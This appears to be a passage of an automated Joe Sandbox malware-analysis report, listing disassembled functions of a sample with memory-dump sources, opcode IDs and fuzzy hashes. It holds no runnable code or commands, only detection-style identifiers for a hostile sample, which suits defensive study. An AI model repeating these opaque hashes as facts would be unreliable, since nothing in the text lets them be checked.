                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bf94ca212df6be57a4582039e96bc6a4280bce6bffeb9136fee065bf35be4ae3
                              • Instruction ID: ca5c0a3dd00bac4842304ae1514582ba85c23baf2a89eddfc3ece0e60ec571b6
                              • Opcode Fuzzy Hash: bf94ca212df6be57a4582039e96bc6a4280bce6bffeb9136fee065bf35be4ae3
                              • Instruction Fuzzy Hash: 18717976D087808BD7519F288880B7A77A2AFC6305F28C36FF8955B393E7789A41C745
                              Function 014EA9BD Relevance: .2, Instructions: 184COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000003.1607628699.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, Offset: 014D5000, based on PE: false
                              • Associated: 00000000.00000003.1607601890.00000000014D5000.00000004.00000020.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_3_14d5000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5c14ffac4d3bef5e372eca2cd24d4845538aaea6da6b94a6f9a3005a214843f2
                              • Instruction ID: 07d0812742ad17e755f8394c8d7359ba7059b0b8117aea5f323c75c27b2ff611
                              • Opcode Fuzzy Hash: 5c14ffac4d3bef5e372eca2cd24d4845538aaea6da6b94a6f9a3005a214843f2
                              • Instruction Fuzzy Hash: 0C61E26241E7C18FC3634F7498266927FB0AE2B61532B54DFC0C1CF5B3E269094ADB62
                              Function 002E4B60 Relevance: .2, Instructions: 166COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5bc73fcceda54d9411f6165138cb6f7a93be55191a10e45b05ad83e8ed2d4e55
                              • Instruction ID: 91b710b091b3b9073204a34dc9ac6d2dd26dfcc68fa2b2fc4a6fdd23aeb993c1
                              • Opcode Fuzzy Hash: 5bc73fcceda54d9411f6165138cb6f7a93be55191a10e45b05ad83e8ed2d4e55
                              • Instruction Fuzzy Hash: A5411373F20A280BE35CD9799C6526A73D297C4310B4A873DDA96C73C1DCB8DD1692C4
                              Function 004DA000 Relevance: .1, Instructions: 122COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                              • Instruction ID: 011159447f7e04d1cdb9f122f9e85871b5165089680cc2765f4ecc3bc68529a4
                              • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                              • Instruction Fuzzy Hash: D831C2313083194BCB15AD69C4E022BF6D39BD8360F55C63FE589C3380EA758C69868B
                              Function 0040AB2C Relevance: .0, Instructions: 47COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                              • Instruction ID: 37be21749cb47c0d1e06bf2400593873b99dcae079383a073933c628d7921d99
                              • Opcode Fuzzy Hash: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                              • Instruction Fuzzy Hash: 25F04F73B656290BE360CDB66D01197A2D3A7C0770F1F857AEC44E7642E9389C4A86CA
                              Function 0040AAC0 Relevance: .0, Instructions: 41COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                              • Instruction ID: f52122b88dfc803ebec3f94e9ae2b5ebb73250ab83089e93671ed17332b62ca6
                              • Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                              • Instruction Fuzzy Hash: DCF08C33A20B340B6360CC7A8D05097A2D797C86B0B0FC979ECA0E7206E930EC0656D5
                              Function 001B6810 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 344COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID:
                              • String ID: [
                              • API String ID: 0-784033777
                              • Opcode ID: 1599a5b274baac0c52aea561f849e1f4fe95aeae6fcde7293d4ec10221dfbacb
                              • Instruction ID: 6d76cc4900a521b844fc564ea13acca53aabe39adbbb46d77ee17d4c5d215f18
                              • Opcode Fuzzy Hash: 1599a5b274baac0c52aea561f849e1f4fe95aeae6fcde7293d4ec10221dfbacb
                              • Instruction Fuzzy Hash: 3EB14971A083915BDB399A25C9917FBBBE8FF75308F18052EE8C5C6182EB3DC9448752